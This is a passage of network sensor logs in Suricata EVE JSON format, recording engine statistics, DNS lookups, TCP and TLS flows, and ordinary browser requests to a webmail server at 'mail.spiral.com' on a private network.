{"timestamp":"2020-02-29T00:23:52.000303+0000","event_type":"stats","stats":{"uptime":15084,"capture":{"kernel_packets":140243,"kernel_drops":0},"decoder":{"pkts":140247,"bytes":96281893,"invalid":195,"ipv4":138672,"ipv6":10,"ethernet":140247,"raw":0,"null":0,"sll":0,"tcp":133120,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2881,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2897,"synack":2888,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"d
ns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2508,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16855,"memcap_state":0,"memcap_global":0},"http":{"memuse":400,"memcap":0}}} {"timestamp":"2020-02-29T00:23:52.000998+0000","flow_id":1992764664025219,"event_type":"flow","src_ip":"192.168.10.122","src_port":52667,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:51.102531+0000","end":"2020-02-29T00:18:51.207491+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:53.234003+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36710,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3775,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:53.345755+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36710,"proto":"UDP","dns":{"type":"answer","id":3775,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:53.345755+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36710,"proto":"UDP","dns":{"type":"answer","id":3775,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:23:53.491588+0000","flow_id":1124622944265220,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52982,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090}} {"timestamp":"2020-02-29T00:23:57.000378+0000","flow_id":171140185030946,"event_type":"flow","src_ip":"192.168.10.122","src_port":35507,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:55.950562+0000","end":"2020-02-29T00:18:56.058921+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:58.492418+0000","flow_id":1124622944265220,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52982,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47021,"tx_id":0}} 
{"timestamp":"2020-02-29T00:23:59.000189+0000","event_type":"stats","stats":{"uptime":15091,"capture":{"kernel_packets":140249,"kernel_drops":0},"decoder":{"pkts":140266,"bytes":96292218,"invalid":195,"ipv4":138691,"ipv6":10,"ethernet":140266,"raw":0,"null":0,"sll":0,"tcp":133137,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2509,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16523,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:01.000154+0000","flow_id":1273696944968040,"event_type":"flow","src_ip":"192.168.10.122","src_port":38608,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:00.250216+0000","end":"2020-02-29T00:19:00.358727+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:04.000676+0000","flow_id":97064884588838,"event_type":"flow","src_ip":"192.168.10.122","src_port":42079,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:03.020774+0000","end":"2020-02-29T00:19:03.129636+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:06.000224+0000","event_type":"stats","stats":{"uptime":15098,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092448},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app
_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2512,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":0,"flows_timeout":3,"flows_timeout_inuse":2,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":15861,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:24:06.002115+0000","flow_id":181357912881723,"event_type":"flow","src_ip":"192.168.10.122","src_port":38040,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:05.227899+0000","end":"2020-02-29T00:19:05.336483+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:08.000606+0000","flow_id":767745518388486,"event_type":"flow","src_ip":"192.168.10.81","src_port":52970,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":4,"bytes_toserver":338,"bytes_toclient":921,"start":"2020-02-29T00:23:02.050438+0000","end":"2020-02-29T00:23:07.279817+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"13","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:24:08.000821+0000","flow_id":769897281519196,"event_type":"flow","src_ip":"192.168.10.122","src_port":56980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:06.949852+0000","end":"2020-02-29T00:19:07.058440+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:12.000443+0000","flow_id":2024272545427820,"event_type":"flow","src_ip":"192.168.10.122","src_port":58238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:11.635244+0000","end":"2020-02-29T00:19:11.743356+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:12.000847+0000","flow_id":1783625527824888,"event_type":"flow","src_ip":"192.168.10.122","src_port":51082,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:11.823800+0000","end":"2020-02-29T00:19:11.928718+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:24:13.000168+0000","event_type":"stats","stats":{"uptime":15105,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2863,"new_pruned":17,"est_pruned":2514,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":14537,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:18.000843+0000","flow_id":1934138362150047,"event_type":"flow","src_ip":"192.168.10.122","src_port":46219,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:17.310431+0000","end":"2020-02-29T00:19:17.418887+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:18.001101+0000","flow_id":836147152779304,"event_type":"flow","src_ip":"192.168.10.122","src_port":35956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:17.489512+0000","end":"2020-02-29T00:19:17.594290+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:19.002380+0000","flow_id":1779901807041841,"event_type":"flow","src_ip":"192.168.10.81","src_port":52976,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":913,"bytes_toclient":3914,"start":"2020-02-29T00:23:13.564529+0000","end":"2020-02-29T00:23:18.577333+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:24:20.000579+0000","event_type":"stats","stats":{"uptime":15112,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7090432},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2863,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":1,"flows_timeout":5,"flows_timeout_inuse":3,"flows_removed":2,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":400,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:21.000189+0000","flow_id":1553466836230670,"event_type":"flow","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":16,"bytes_toserver":3253,"bytes_toclient":13426,"start":"2020-02-29T00:23:13.565774+0000","end":"2020-02-29T00:23:19.064430+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:21.000541+0000","flow_id":1327585916188998,"event_type":"flow","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":30,"pkts_toclient":38,"bytes_toserver":7697,"bytes_toclient":42976,"start":"2020-02-29T00:23:13.555334+0000","end":"2020-02-29T00:23:19.063679+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:21.000749+0000","flow_id":1632747637355106,"event_type":"flow","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":52,"pkts_toclient":69,"bytes_toserver":11289,"bytes_toclient":73773,"start":"2020-02-29T00:23:10.307810+0000","end":"2020-02-29T00:23:19.067296+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:24:23.000496+0000","flow_id":2025049950055944,"event_type":"flow","src_ip":"192.168.10.130","src_port":34276,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":36,"pkts_toclient":64,"bytes_toserver":3765,"bytes_toclient":80837,"start":"2020-02-29T00:23:08.323080+0000","end":"2020-02-29T00:23:13.392667+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:26.000704+0000","flow_id":96399181527716,"event_type":"flow","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1110,"start":"2020-02-29T00:23:20.440996+0000","end":"2020-02-29T00:23:25.669829+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:24:27.000194+0000","event_type":"stats","stats":{"uptime":15119,"capture":{"kernel_packets":140276,"kernel_drops":0},"decoder":{"pkts":140360,"bytes":96376290,"invalid":195,"ipv4":138781,"ipv6":10,"ethernet":140360,"raw":0,"null":0,"sll":0,"tcp":133227,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089280},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2868,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:34.002570+0000","event_type":"stats","stats":{"uptime":15126,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:42.000226+0000","event_type":"stats","stats":{"uptime":15134,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:47.000550+0000","flow_id":206771237029553,"event_type":"flow","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:46.460465+0000","end":"2020-02-29T00:19:46.569640+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:47.000963+0000","flow_id":2245338809397529,"event_type":"flow","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:19:46.684313+0000","end":"2020-02-29T00:19:46.910017+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:48.001081+0000","flow_id":302055086514181,"event_type":"flow","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:19:46.942085+0000","end":"2020-02-29T00:19:47.309545+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:48.328496+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067}} 
